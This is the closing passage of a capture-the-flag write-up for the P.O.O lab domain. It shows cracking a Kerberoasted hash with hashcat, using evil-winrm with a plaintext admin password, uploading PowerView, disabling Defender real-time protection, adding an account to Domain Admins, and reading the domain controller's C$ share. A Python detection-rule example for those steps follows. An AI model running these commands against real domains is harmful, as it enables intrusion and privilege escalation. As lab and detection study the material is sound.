                       00E2B289CB7373FB14DC2A6E0F7E22F18597586F1A145C50BD4A75C51821D42DE54B87E106A57891FAEE125B15A74BB6
                       9CCB6BBF2AE84B560DE1B82350664C8009EF59D8A613DAED8ED48820F87739BFE1CB154AD6E164D93E34D562F08704D5
                       D3BEB51E72984ED9A0B7A85724248CFACAD778A81820ABA8EC75CF6557D4D0668FD976D5F47D6A56CE9AECE7F715E902
                       9D2736720582BEE47FDFB5817CD14AD79ED7FD7F4D5EA9ABA345B18343CCB1130E1182D426345087B9773C2A82FB9B1E
                       D99BCAA327E6C1A7B88CB76EE5C6E402F6DC3AEC9947BF31D6795CBE6C042C9BB12E33EC427A94B028A2DB87B9490C72
                       3F1DEB5E686D3914E811BEA7854307A210130F9D7E590BD05412DFC4CFAB564F977FE534B7E351415F1631230FDA506A
                       EC76D540094C10235ECC34DA09C3C409F1B94743A15C09AD971D91E490EEC69578C05CFB17DE51EA5D4514C4AF713F69
                       5727C3B73024E7950A70D360D6A65020C0D27418A2CEDDAFA6CF266251B301CDA4762B3B4A4549F22B49F6173FF9305D
                       53E0A6B9C150CC0A254F4142AAB6FCD8EEBD145C2656CBA21FD95F666AB79CD78261D79D7BCD30E7EAEDD4CF0312A7C5
                       405B6CA0196142D23D3145D7742996AF23B6F8A8E05EBEF9021B161ABA86A3BCCE649FF4CE9170DAA57DF349B45AED1B
                       5F3092B636CB840162647118BA01D8408684E0AC468C6342205D52C920CA7A1AFBBF57E19FAADCB891A69E6B32E36940
                       333F1BD65BA3475AAFC5837219076E06301A2082C41ED300BF267D94D8CC4B7A7AFAC548336C73D763FC5FE28B46D64B
                       9FE4D1918B790C9101D9EBC90B5A096FEAEA182A01DEC30C390879CDAF60B4157D5D618611805E7E87D19902A99C4BE5
                       F3005190D44A115F5EEBF2FD29A999C79FFC9CF0AECD5073B9F5300CA8F0397CCFE9A489C012711DB89316EA65879C1E
                       FB644F84EE8D0267556936F4A2C3E907B7FB36D6D77B91404D74E225CA96E40F6DE3DF51C5750AD70AB84F443B7
SamAccountName       : p00_adm
DistinguishedName    : CN=p00_adm,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : cyber_audit/intranet.poo:443

hashcat#

Once you have the SPN ticket hashes, just crack them with hashcat; if you don't specify the output, the result will not be displayed.
hashcat -m 13100 hash.txt /usr/share/seclists/Passwords/Keyboard-Combinations.txt --force #
The password is ZQ!5t4r

Uploading the PS script#

At first I missed an IPv6 address; WinRM can be used to connect to it and move laterally.

evil-winrm -i compatibility -u administrator -p 'EverybodyWantsToWorkAtP.O.O.'
*Evil-WinRM* PS C:\programdata> upload /opt/PowerSploit/Recon/PowerView.ps1
Info: Uploading /opt/PowerSploit/Recon/PowerView.ps1 to C:\programdata\PowerView.ps1
                                                            
Data: 1027036 bytes of 1027036 bytes copied        
                                                                 
Info: Upload successful!

Upload successful.

Import-Module .\PowerView.ps1 loads the PowerShell script.

If it gets blocked, Windows Defender (WD) real-time protection needs to be turned off:

*Evil-WinRM* PS C:\programdata> Set-MpPreference -DisableRealtimeMonitoring $true

Adding to the Domain Admins group#

Now I'll create a PSCredential object and then add p00_adm to Domain Admins:

*Evil-WinRM* PS C:\programdata> $pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred

Reference article: https://adamtheautomator.com/powershell-get-credential

PWN#

Since p00_adm is now a domain admin, it can access the c$ share on the DC:

*Evil-WinRM* PS C:\programdata> net use \\DC.intranet.poo\c$ /u:intranet.poo\p00_adm 'ZQ!5t4r'
The command completed successfully.
*Evil-WinRM* PS C:\programdata> dir \\DC.intranet.poo\c$\users\
    Directory: \\DC.intranet.poo\c$\users
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        3/15/2018   1:20 AM                Administrator
d-----        3/15/2018  12:38 AM                mr3ks
d-r---       11/21/2016   3:24 AM                Public


*Evil-WinRM* PS C:\programdata> type \\DC.intranet.poo\c$\users\mr3ks\desktop\flag.txt
POO{1196ef8b************************}
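Each step in this section and the two before it (the RC4 service-ticket requests behind the Kerberoast output, disabling Defender real-time protection, the Domain Admins membership change, and opening C$ on the DC) leaves a Windows event behind. As an added example that is not part of the original write-up, the Python below runs four small detection rules over constructed sample events modelled on those steps. The event fields mirror the Windows Security log (4769, 4728, 5140) and the Defender operational log (5001); the requesting account 'user1' is invented, and the rule names are my own:

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    """Minimal stand-in for one parsed Windows event record."""
    event_id: int
    fields: dict


PRIV_GROUPS = {"domain admins", "enterprise admins", "administrators", "schema admins"}


def is_machine_account(name: str) -> bool:
    # Computer accounts end in '$' and request service tickets constantly.
    return name.endswith("$")


def rule_kerberoast(e: Event):
    """4769 (TGS requested) with RC4 (0x17) for a user account's SPN."""
    if e.event_id != 4769:
        return None
    f = e.fields
    svc = f.get("ServiceName", "")
    if f.get("TicketEncryptionType", "").lower() != "0x17":
        return None
    if not svc or is_machine_account(svc) or svc.lower() == "krbtgt":
        return None
    return ("kerberoast",
            f"{f['TargetUserName']} requested an RC4 ticket for {svc} from {f['IpAddress']}")


def rule_priv_group_add(e: Event):
    """4728/4732/4756: member added to a security-enabled group; Domain Admins is global (4728)."""
    if e.event_id not in (4728, 4732, 4756):
        return None
    f = e.fields
    if f.get("TargetUserName", "").lower() not in PRIV_GROUPS:
        return None
    return ("priv_group_add",
            f"{f['SubjectUserName']} added {f['MemberName']} to {f['TargetUserName']}")


def rule_defender_rtp_off(e: Event):
    """Microsoft-Windows-Windows Defender/Operational 5001: real-time protection disabled."""
    if e.event_id == 5001 and e.fields.get("Provider") == "Microsoft-Windows-Windows Defender":
        return ("defender_rtp_off",
                f"real-time protection disabled on {e.fields['Computer']}")
    return None


def rule_admin_share(e: Event):
    """5140: C$ or ADMIN$ opened over the network; on a DC this is the post's final step."""
    if e.event_id != 5140:
        return None
    f = e.fields
    if not f.get("ShareName", "").upper().endswith(("\\C$", "\\ADMIN$")):
        return None
    return ("admin_share",
            f"{f['SubjectUserName']} opened {f['ShareName']} on {f['Computer']} from {f['IpAddress']}")


RULES = (rule_kerberoast, rule_priv_group_add, rule_defender_rtp_off, rule_admin_share)


def run_rules(events):
    """Apply every rule to every event; returns the list of (tag, message) hits."""
    hits = []
    for e in events:
        for rule in RULES:
            hit = rule(e)
            if hit:
                hits.append(hit)
    return hits


def kerberoast_bursts(events, min_spns=2):
    """Distinct SPNs roasted per requester; roasting tools pull every SPN in one burst."""
    spns = defaultdict(set)
    for e in events:
        if rule_kerberoast(e):
            spns[e.fields["TargetUserName"].lower()].add(e.fields["ServiceName"].lower())
    return {u: len(s) for u, s in spns.items() if len(s) >= min_spns}


# Constructed sample events modelled on the steps in the post ('user1' is invented).
SAMPLE_EVENTS = [
    Event(4769, {"TargetUserName": "user1@INTRANET.POO", "ServiceName": "p00_hr",
                 "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11"}),
    Event(4769, {"TargetUserName": "user1@INTRANET.POO", "ServiceName": "p00_adm",
                 "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11"}),
    Event(4769, {"TargetUserName": "DC$@INTRANET.POO", "ServiceName": "COMPATIBILITY$",
                 "TicketEncryptionType": "0x12", "IpAddress": "::1"}),  # benign AES machine ticket
    Event(4728, {"SubjectUserName": "p00_adm",
                 "MemberName": "CN=p00_adm,CN=Users,DC=intranet,DC=poo",
                 "TargetUserName": "Domain Admins"}),
    Event(5001, {"Provider": "Microsoft-Windows-Windows Defender",
                 "Computer": "COMPATIBILITY.intranet.poo"}),
    Event(5140, {"SubjectUserName": "p00_adm", "ShareName": "\\\\*\\C$",
                 "Computer": "DC.intranet.poo", "IpAddress": "10.13.38.11"}),
]

if __name__ == "__main__":
    for tag, msg in run_rules(SAMPLE_EVENTS):
        print(f"[{tag}] {msg}")
    print(kerberoast_bursts(SAMPLE_EVENTS))
```

Two of these rules need tuning in a real environment: 4769 with RC4 is noisy until the domain is AES-only (the burst count is the better first filter), and 5140 requires object access auditing for file shares to be enabled on the DC or it is never logged at all.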

END.

Summary#

With that, P.O.O is finally complete. I relied on a lot of write-ups for help and got to know and learn many things I didn't know before.
The Recon part was directory enumeration, exploiting the IIS short-name vulnerability.
The Huh?! part was SQL Server privilege escalation, exploiting a misconfigured linked database to gain higher privileges.
The BackTrack part was reading a sensitive file on the IIS server, C:\inetpub\wwwroot\web.config: when SQL Server runs the external scripting engine, the code executes as a different user, which gave us permission to read web.config.
The Foothold part showed that some services are not only on the IPv4 address but may be on IPv6; beyond the difference between TCP and UDP transport, sometimes you also need to check the services on IPv6.
The p00ned part was domain privilege escalation: obtain the password by cracking the Kerberos service ticket, then elevate the user to Domain Admin, which gives access to the domain controller.
